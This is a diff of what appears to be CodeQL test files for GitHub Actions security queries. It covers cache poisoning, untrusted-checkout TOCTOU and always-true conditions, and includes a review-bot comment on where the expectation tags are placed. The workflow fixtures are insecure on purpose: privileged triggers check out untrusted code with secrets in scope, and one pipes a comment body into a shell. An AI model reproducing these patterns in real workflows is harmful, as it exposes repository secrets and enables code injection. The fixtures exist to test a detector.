 | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step |
-#select
-| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target |
-| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@).
| .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target |
-| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target |
-| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target |
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref
index 9d1910990fc..0002f755786 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref
@@ -1,2 +1,2 @@
-Security/CWE-349/CachePoisoningViaDirectCache.ql
-
+query: Security/CWE-349/CachePoisoningViaDirectCache.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected
index 6b1a3e87313..57a1fd7b8d8 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected
@@ -1,3 +1,11 @@
+#select
+| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@).
| .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target |
 edges
 | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step |
 | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step |
@@ -43,11 +51,3 @@ edges
 | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step |
 | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step |
 | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step |
-#select
-| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target |
-| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target |
-| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target |
-| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target |
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
index 89db21d70f5..9855767d1a8 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
@@ -1,2 +1,2 @@
-Security/CWE-349/CachePoisoningViaPoisonableStep.ql
-
+query: Security/CWE-349/CachePoisoningViaPoisonableStep.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
index a4acd738766..abea1002fd3 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
@@ -55,9 +55,9 @@ jobs:
 with:
 submodules: recursive
 ref: ${{ fromJson(steps.issue.outputs.result).ref }}
- - run: bash comment_example/tests.sh
+ - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical]
- test3:
+ test3: # $ Alert[actions/untrusted-checkout-toctou/critical]
 if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
 runs-on: ubuntu-latest
 steps:
@@ -65,4 +65,4 @@ jobs:
 with:
 submodules: recursive
 ref: "refs/pull/${{ github.event.number }}/merge"
- - run: bash comment_example/tests.sh
+ - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml
index a4acd738766..abea1002fd3 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml
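Review bot: The `$ Alert` tag placed on `test3:` and the `$ Source` tag on the first `- run: bash comment_example/tests.sh` line do not describe the lines they sit on: the expected file in this same commit locates that sink at `comment.yml:58:9:60:2` and its source (the checkout step) at `54:9:58:6`, so the inline-expectations postprocessor appears to match tags on the end line of a location, which for block-style steps is the line where the next step or job begins. The same offset placement recurs in test0.yml (an identical blob), test4.yml (`$ Source` on `- name: Environment setup`, `$ Alert` on the `azure_creds:` line), test5.yml, test6.yml and the CWE-829 `download-artifact*/action.yaml` fixtures, where `$ Alert[actions/unversioned-immutable-action]` lands on a `run:` step. A reader of these fixtures will attribute the untrusted-checkout-toctou finding to the wrong step, and a future edit that inserts a line between two steps will silently move the expectation. Consider a one-line header in each annotated fixture such as `# Inline expectation tags match on the END line of a step's location, so a tag may sit on the line where the following step or job starts.`, or, if the postprocessor can be changed, matching on the start line so the tag sits on the step it describes.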
@@ -55,9 +55,9 @@ jobs:
 with:
 submodules: recursive
 ref: ${{ fromJson(steps.issue.outputs.result).ref }}
- - run: bash comment_example/tests.sh
+ - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical]
- test3:
+ test3: # $ Alert[actions/untrusted-checkout-toctou/critical]
 if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
 runs-on: ubuntu-latest
 steps:
@@ -65,4 +65,4 @@ jobs:
 with:
 submodules: recursive
 ref: "refs/pull/${{ github.event.number }}/merge"
- - run: bash comment_example/tests.sh
+ - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml
index 9444ad0b627..937f223a5a2 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml
@@ -82,8 +82,8 @@ jobs:
 with:
 ref: ${{ steps.environment.outputs.head_sha }}
- - name: Environment setup
+ - name: Environment setup # $ Source[actions/untrusted-checkout-toctou/critical]
 uses: ./.github/actions/setup-env
 with:
- azure_creds: ${{ secrets.AZURE_CREDENTIALS }}
+ azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Alert[actions/untrusted-checkout-toctou/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml
index e3e557cc511..5cd25eb52cb 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml
@@ -90,7 +90,7 @@ jobs:
 with:
 ref: ${{ steps.comment-branch.outputs.head_ref }}
- - name: Get environment from comment
+ - name: Get environment from comment # $ Source[actions/untrusted-checkout-toctou/critical]
 id: environment
 shell: bash
 env:
@@ -153,7 +153,7 @@ jobs:
 with:
 azure_creds: ${{ secrets.AZURE_CREDENTIALS }}
- - name: Deploy server
+ - name: Deploy server # $ Alert[actions/untrusted-checkout-toctou/critical]
 if: >-
 ${{
 (contains(github.event.comment.body, '/deploy to') ||
@@ -166,7 +166,7 @@ jobs:
 COMMENT_BODY: ${{ github.event.comment.body }}
 run: poetry run python server.py --endpoint_location=remote --autodeploy=True
- - name: Deploy scorer
+ - name: Deploy scorer # $ Alert[actions/untrusted-checkout-toctou/critical]
 if: >-
 ${{
 contains(github.event.comment.body, '/deploy as async scorer') ||
@@ -177,7 +177,7 @@ jobs:
 PR_NUMBER: ${{ github.event.issue.number }}
 run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True
- - name: Set latest commit status as ${{ job.status }}
+ - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical]
 uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1
 if: always()
 with:
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml
index 4a6d1452af2..bf14336adb6 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml
+++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml
@@ -44,7 +44,7 @@ jobs:
 with:
 ref: ${{ steps.comment-branch.outputs.head_ref }}
- - name: Install GH CLI
+ - name: Install GH CLI # $ Alert[actions/untrusted-checkout-toctou/high]
 uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0
 - name: Check comment keywords
@@ -94,7 +94,7 @@ jobs:
 with:
 ref: ${{ steps.comment-branch.outputs.head_ref }}
- - name: Log into Azure
+ - name: Log into Azure # $ Alert[actions/untrusted-checkout-toctou/high]
 uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0
 with:
 creds: ${{ secrets.AZURE_CREDENTIALS }}
@@ -164,7 +164,7 @@ jobs:
 with:
 ref: ${{ steps.comment-branch.outputs.head_ref }}
- - name: Get pipeline info from comment
+ - name: Get pipeline info from comment # $ Source[actions/untrusted-checkout-toctou/critical]
 id: pipeline-info
 run: |
 model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \
@@ -215,13 +215,13 @@ jobs:
 with:
 azure_creds: ${{ secrets.AZURE_CREDENTIALS }}
- - name: Kickoff run
+ - name: Kickoff run # $ Alert[actions/untrusted-checkout-toctou/critical]
 if: contains(github.event.comment.body, '/kickoff')
 env:
 BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }}
- - name: Set latest commit status as ${{ job.status }}
+ - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical]
 uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1
 if: always()
 with:
diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
index da66ff822a3..cf212950f1e 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
+++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
@@ -1,3 +1,14 @@
+#select
+| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
 edges
 | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step |
 | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step |
@@ -96,14 +107,3 @@ edges
 | .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step |
 | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step |
 | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step |
-#select
-| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref
index f924f8fe750..c4a686750f3 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref
@@ -1 +1,2 @@
-Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
+query: Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref
index 6284c786b3a..67d2bf06c39 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref
@@ -1 +1,2 @@
-Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
+query: Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml
index bbbcc5aaa79..e3b1c4047f8 100644
--- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml
@@ -16,7 +16,7 @@ jobs:
 ${{
 1 == 2 ||
 3 == 4
- }}
+ }} # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 2 should not be printed"
 - name: Test 3
 if: ${{ 1 == 2 }}
@@ -31,7 +31,7 @@ jobs:
 }}
 run: echo "Test 5 should not be printed"
 - name: Test 6
- if: ${{ 1 == 1 }} ${{ 1 == 2 }}
+ if: ${{ 1 == 1 }} ${{ 1 == 2 }} # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 6 should not be printed"
 - name: Test 7
 run: echo "Test 7 should not be printed"
@@ -45,7 +45,7 @@ jobs:
 if: >
 ${{ 1 == 2 ||
- 3 == 4 }}
+ 3 == 4 }} # $ Alert[actions/if-expression-always-true/high]
 - name: Test 9
 if: '${{ 1 == 2 }}'
 run: echo "Test 9 should not be printed"
@@ -53,10 +53,10 @@ jobs:
 if: "${{1 == 2 }}"
 run: echo "Test 10 should not be printed"
 - name: Test 11
- if: " ${{ 1 == 2 }}"
+ if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 11 should not be printed"
 - name: Test 12
- if: " ${{ 1 == 2 }}"
+ if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 12 should not be printed"
 - name: Test 13
 if: |
@@ -79,27 +79,27 @@ jobs:
 if: |+
 ${{( false ||
 1 == 2
- )}}
+ )}} # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 16 should not be printed"
 - name: Test 17
 if: >+
 ${{( false ||
 1 == 2
- )}}
+ )}} # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 17 should not be printed"
 - name: Test 18
- if: ${{ github.event_name }} == 'foo'
+ if: ${{ github.event_name }} == 'foo' # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 18 should not be printed"
 - name: Test 19
- if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo'
+ if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 19 should not be printed"
 - name: Test 20
- if: ${{ hashFiles('./docker/Dockerfile.debian') }} != ""
+ if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 20 should not be printed"
 - name: Test 21
 if: >
 ${{ github.event.workflow_run.event == 'pull_request' &&
- github.event.workflow_run.conclusion == 'success' }}
+ github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/high]
 run: echo "Test 21 should not be printed"
 - name: Test 22
 if: |
diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml
index 8b863037e29..10688938a01 100644
--- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml
+++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml
@@ -16,7 +16,7 @@ jobs:
 ${{
 github.actor == "foo" ||
 3 == 4
- }}
+ }} # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 2 should not be printed"
 - name: Test 3
 if: ${{ github.actor == "foo" }}
@@ -31,7 +31,7 @@ jobs:
 }}
 run: echo "Test 5 should not be printed"
 - name: Test 6
- if: ${{ 1 == 1 }} ${{ github.actor == "foo" }}
+ if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} # $ Alert[actions/if-expression-always-true/critical]
 run: echo "Test 6 should not be printed"
 - name: Test 7
 run: echo "Test 7 should not be printed"
@@ -45,7 +45,7 @@ jobs:
 if: >
 ${{ github.actor == "foo" ||
